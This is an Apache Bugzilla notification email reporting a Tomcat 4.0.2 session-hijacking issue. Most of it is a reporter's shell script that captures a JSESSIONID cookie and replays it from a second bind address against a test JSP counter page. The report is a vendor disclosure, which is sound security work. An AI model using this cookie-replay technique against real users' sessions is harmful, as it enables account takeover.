DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12904>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND INSERTED IN THE BUG DATABASE.
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12904 Session hijaking - see script's comment Summary: Session hijaking - see script's comment Product: Tomcat 4 Version: 4.0.2 Final Platform: Other OS/Version: Linux Status: UNCONFIRMED Severity: Major Priority: Other Component: Unknown AssignedTo: [EMAIL PROTECTED] ReportedBy: [EMAIL PROTECTED] #!/bin/sh # # Demonstrate a session hijaking against a Jakarta/Tomcat 4.0.3 JSP page. # # Objective: intrusion in a user-established http session context # from another IP through JSESSIONID interception and reuse. # # Test against: # - a JSP page which increment a session-counter # # How: # - Execute an HTTP call from an IP address # - Obtain a JSESSION ID # - Execute another HTTP from another IP address reusing JSESSION ID # # Result: # - The per user session counter have a double increment # # Defacement: # - The second HTTP request WOULD BE REJECTED due to an unadmissible # source IP/JSESSION ID couple # # Test environment: # Linux Mandrake 8.1 # JVM 1.3.1 # Tomcat 4.0.2 # # # a page which return an auto-incremental number (1 counter per session) URL=http://k900:8080/autosc3000/app/jsp/Mytest2.jsp cookie="x" i=0 while : ; do m=$[$i%2] if [ $m = "1" ]; then address=k900 else address=localhost fi # HTTP request to tomcat wget --header="Cookie: $cookie" -s --bind-address=$address -O x $URL \ > /dev/null 2>/dev/null echo -n $address" " cat x | grep Mytest -A 1 | tail -1 if [ $cookie = "x" ]; then cookie="`cat x | grep Set-Cookie | tr ";" " " | awk '{print $2}'`" fi i=$[$i+1] sleep 1 done -- To unsubscribe, e-mail: <mailto:[EMAIL PROTECTED]> For additional commands, e-mail: <mailto:[EMAIL PROTECTED]>
